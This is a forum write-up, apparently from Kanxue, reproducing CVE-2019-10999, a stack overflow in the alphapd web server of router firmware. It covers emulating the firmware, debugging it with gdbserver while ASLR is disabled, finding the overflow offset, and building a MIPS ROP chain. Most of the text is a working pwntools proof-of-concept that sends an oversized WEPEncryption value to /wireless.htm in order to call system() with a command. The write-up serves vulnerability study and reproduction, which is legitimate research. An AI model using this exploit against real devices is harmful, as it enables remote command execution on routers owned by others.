CVE-2019-10999复现学习
本文为看雪论坛精华文章
看雪论坛作者ID:Catsay
固件仿真
# Firmware emulation setup: bind the host's /dev and a proc filesystem into
# the extracted rootfs (the ./dev and ./proc targets suggest this runs inside
# a chroot of the firmware image — the chroot itself is not shown here).
mount -o bind /dev/ ./dev/
mount -t proc /proc/ ./proc
# Stop any alphapd instance that is already running (-q: stay quiet if none),
# give it a moment to exit, then restart the web server in the background.
killall -q alphapd
sleep 1
alphapd &
# Start alphapd under gdbserver listening on TCP port 23946 so it can be
# driven from a remote gdb (the binary name suggests a MIPS little-endian
# build of gdbserver).
./gdbserver-mipsel :23946 ./bin/alphapd
调试
关闭 ASLR:echo 0 > /proc/sys/kernel/randomize_va_space
# Alternative to launching under gdbserver: attach to the alphapd process that
# is already running (alphapdPID stands for its process id) on the same port.
./gdbserver-mipsel :23946 --attach alphapdPID
# gdb side of the session: set the target architecture and byte order before
# connecting, otherwise gdb cannot decode the remote's registers correctly.
set arch mips
set endian little
# Connect to the remote gdbserver.
# NOTE(review): port 40496 differs from the :23946 gdbserver was started on
# above — confirm whether a port forward sits in between or which port is
# actually in use.
target remote 192.168.50.214:40496
挖掘漏洞
> cyclic -l 0x6161616b
40
Libc基地址
Rop
.text:0004A604 addiu $s2, $sp, 0x1E8+var_F8
.text:0004A608 move $a0, $s2
.text:0004A60C move $t9, $s0
.text:0004A610 jalr $t9 ; sub_49DF0
"""Proof-of-concept request builder for CVE-2019-10999 (stack overflow in alphapd).

Everything below is tied to the debugging session described above: ASLR is
switched off there (randomize_va_space = 0), so the libc base and the stack
address used in the payload are fixed literals and the request only behaves
as intended under that exact memory layout.  With ASLR enabled those values
no longer hold — address randomisation is the mitigation this write-up
deliberately disables for reproducibility.
"""
import socket
from pwn import *

context.log_level = 'debug'
context.arch = "mips"

# Libc base observed in the debugger; the offsets below are added to it.
Libc_Addr = 0x77eda000
# Offset of system() inside libc.
# NOTE(review): taken from the write-up's analysis, not derivable from this
# script alone — verify against the libc build actually shipped.
system_Addr = 0x0045080
# Command string; ${IFS} stands in for a space so the value survives being
# carried in an HTTP query string.
cmd = "echo${IFS}'Pwn!'"
# Offset of the gadget at .text:0004A608 (move $a0,$s2 / move $t9,$s0 / jalr $t9).
gadget = 0x004A608

# Stack layout as labelled below: 16 bytes of filler, then the saved
# registers S0..S3 and two unlabelled filler words, then the saved return
# address (PC), then the command string.  16 + 6*4 = 40 matches the offset
# reported by `cyclic -l 0x6161616b` above.
payload = cyclic(16).upper()
payload += p32(Libc_Addr+system_Addr) # S0
# p -> 0x77F24604
payload += 'BBBB' # S1
# Hard-coded stack address — only meaningful with ASLR off, see module docstring.
payload += p32(0x7fffe2a8) # S2
payload += 'DDDD' # S3
payload += 'EEEE'
payload += 'FFFF'
payload += p32(Libc_Addr+gadget) # PC
payload += 'HHHH'
payload += cmd

if __name__ == '__main__':
    #key = "Content-Type:text/html;charset:utf-8\r\n"
    RHOST = '127.0.0.1'
    RPORT = 40080
    # The overflow travels in the WEPEncryption query parameter of
    # /wireless.htm.  From a detection standpoint, an oversized or
    # non-printable value for that parameter is the observable artefact.
    request = ""
    request+= "GET /wireless.htm?WEPEncryption={} HTTP/1.1\r\n".format(payload)
    request+= "Host: {}:{}\r\n".format(RHOST,str(RPORT))
    # NOTE(review): the headers below are appended without "\r\n" separators,
    # so on the wire they run together into a single header line — another
    # distinguishing artefact in captured traffic.
    request+= "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0"
    request+= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
    request+= "Accept-Language: en-US,en;q=0.5"
    request+= "Accept-Encoding: gzip, deflate"
    request+= "Connection: close"
    request+= "Upgrade-Insecure-Requests: 1"
    request+= "\r\n\r\n"
    # Plain TCP send of the request; the response is never read (the recv
    # below is commented out), so success is judged in the debugger, not here.
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((RHOST,RPORT))
    s.send(request)
    print(request)
    # msg = s.recv(1024)
    s.close()
    # print msg
看雪ID:Catsay
https://bbs.pediy.com/user-home-642281.htm